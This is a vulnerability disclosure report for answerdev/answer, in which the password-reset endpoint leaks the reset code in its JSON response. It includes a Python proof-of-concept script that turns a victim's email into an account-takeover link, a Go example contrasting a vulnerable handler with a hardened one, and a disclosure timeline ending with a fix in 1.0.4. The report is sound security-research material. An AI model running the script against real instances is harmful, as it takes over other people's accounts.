Account Takeover via reset password in answerdev/answer


Reported on Jan 24th 2023


The password-recovery endpoint returns the reset code in its JSON response, so anyone who knows a victim's email address can complete the reset and take over the account.

Proof of Concept

Create an account on the target instance, verify the email address, then log out.

Go to password recovery, enter the victim's email address and capture the server response; it will look something like the following (the reset code is carried in the "data" field of the JSON body):

Copy the value of the "data" field and open the password-reset page with it as the code parameter (users/password-reset?code=<data>, which is exactly what the script below builds):

ATO :)


Compromise any account knowing only the email address
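To make the flaw concrete, here is an added Go example; it is not code from the answerdev/answer repository. It pairs a minimal stand-in handler that echoes the freshly issued reset code in the JSON "data" field (exactly what the PoC reads) with a hardened version that keeps the code out of the response and only queues it for the mailbox owner. The store, the route path, the "e_mail" request field and the response shape are assumptions modelled on the request and response described in this report, not the project's real implementation, and the "outbox" is a constructed in-memory list standing in for the mailer.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync"
)

// resetStore is a constructed in-memory stand-in for the reset-code table
// and for the mailer (assumption: the real project persists codes elsewhere).
type resetStore struct {
	mu    sync.Mutex
	codes map[string]string // email -> currently valid reset code
	sent  []string          // constructed "outbox": what would have been emailed
}

func newResetStore() *resetStore {
	return &resetStore{codes: map[string]string{}}
}

// issue generates an unguessable code, stores it and queues the mail.
func (s *resetStore) issue(email string) (string, error) {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	code := hex.EncodeToString(b)
	s.mu.Lock()
	defer s.mu.Unlock()
	s.codes[email] = code
	s.sent = append(s.sent, fmt.Sprintf("to=%s code=%s", email, code))
	return code, nil
}

// resetReq mirrors the request body the PoC sends (field name assumed from the report).
type resetReq struct {
	Email string `json:"e_mail"`
}

func decodeReq(w http.ResponseWriter, r *http.Request) (resetReq, bool) {
	var req resetReq
	if err := json.NewDecoder(r.Body).Decode(&req); err != nil || req.Email == "" {
		http.Error(w, "bad request", http.StatusBadRequest)
		return req, false
	}
	return req, true
}

// vulnerableReset reproduces the flaw: the code that was just issued is
// returned to whoever made the request instead of only to the mailbox owner.
func vulnerableReset(s *resetStore) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		req, ok := decodeReq(w, r)
		if !ok {
			return
		}
		code, err := s.issue(req.Email)
		if err != nil {
			http.Error(w, "internal error", http.StatusInternalServerError)
			return
		}
		json.NewEncoder(w).Encode(map[string]interface{}{"code": 200, "data": code})
	}
}

// hardenedReset issues the code the same way but never puts it in the body;
// the response is identical whether or not the address is registered.
func hardenedReset(s *resetStore) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		req, ok := decodeReq(w, r)
		if !ok {
			return
		}
		if _, err := s.issue(req.Email); err != nil {
			http.Error(w, "internal error", http.StatusInternalServerError)
			return
		}
		json.NewEncoder(w).Encode(map[string]interface{}{"code": 200, "data": nil,
			"msg": "if the address is registered, a reset link has been sent"})
	}
}

// requestReset plays the attacker: it posts the reset request and returns the
// "data" field as a string ("" when absent or null), i.e. what the PoC script reads.
func requestReset(h http.HandlerFunc, email string) (string, error) {
	rec := httptest.NewRecorder()
	req := httptest.NewRequest(http.MethodPost, "/answer/api/v1/user/password/reset",
		strings.NewReader(fmt.Sprintf(`{"e_mail":%q}`, email)))
	h(rec, req)
	var body struct {
		Data *string `json:"data"`
	}
	if err := json.Unmarshal(rec.Body.Bytes(), &body); err != nil {
		return "", err
	}
	if body.Data == nil {
		return "", nil
	}
	return *body.Data, nil
}

func main() {
	s := newResetStore()
	leaked, _ := requestReset(vulnerableReset(s), "victim@example.com")
	fmt.Println("vulnerable handler leaked the reset code:", leaked != "")
	safe, _ := requestReset(hardenedReset(s), "victim@example.com")
	fmt.Println("hardened handler leaked the reset code:", safe != "")
	fmt.Println("mails queued for the mailbox owner:", len(s.sent))
}
```

The point the hardened handler makes is that the reset code is a bearer credential: it must only travel over the channel that proves mailbox ownership, and the HTTP response to the unauthenticated requester must carry nothing that depends on it. Returning the same body for unknown addresses also keeps the endpoint from doubling as an account-enumeration oracle.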


The script below is attached so you don't have to use Burp Suite :)

from sys import argv, exit
import urllib3
from requests import post

# verify=False is used below; silence the InsecureRequestWarning it triggers
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def ato(url: str, email: str) -> str:
    """Request a password reset for `email` and build the reset link from the
    code that the vulnerable endpoint leaks in the JSON "data" field."""
    try:
        resp = post(f"{url}answer/api/v1/user/password/reset",
                    json={"e_mail": email}, verify=False)
        return f"Your Link: {url}users/password-reset?code=" + resp.json()["data"]
    except Exception as err:
        return f"Cant reach URL: {err}"


if __name__ == "__main__":
    if len(argv) != 3:
        print(f"Usage: {argv[0]} https://answer.domain/ victim@example.com")
        exit(1)

    # Normalise the base URL so the paths above can be appended directly
    base = argv[1] if argv[1].endswith("/") else argv[1] + "/"
    print(ato(base, argv[2]))


[Screenshots attached to the report: return code, return code function definition, response handler]

We are processing your report and will contact the answerdev/answer team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
Eduardo modified the report a year ago
Eduardo modified the report a year ago
We have contacted a member of the answerdev/answer team and are waiting to hear back a year ago
Eduardo modified the report a year ago
answerdev/answer maintainer validated this vulnerability a year ago
blueudp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7 a year ago


Thank you very much for your validation; do you need anything else at the moment?

a year ago


Hello, how are you doing?

I have seen a commit where you have fixed the bug.

Could you please associate the commit with the report and assign a CVE?

Thank you in advance. Best regards.

a year ago


@admin, there has been no response in this thread since the report validation; could you start the CVE assignment process, please?

a year ago


I have contacted an answerdev member privately, they want to keep the report private until the new release comes out. Is it possible to start the CVE assignment process without making the report public?

answerdev/answer maintainer marked this as fixed in 1.0.4 with commit c1fa2b a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago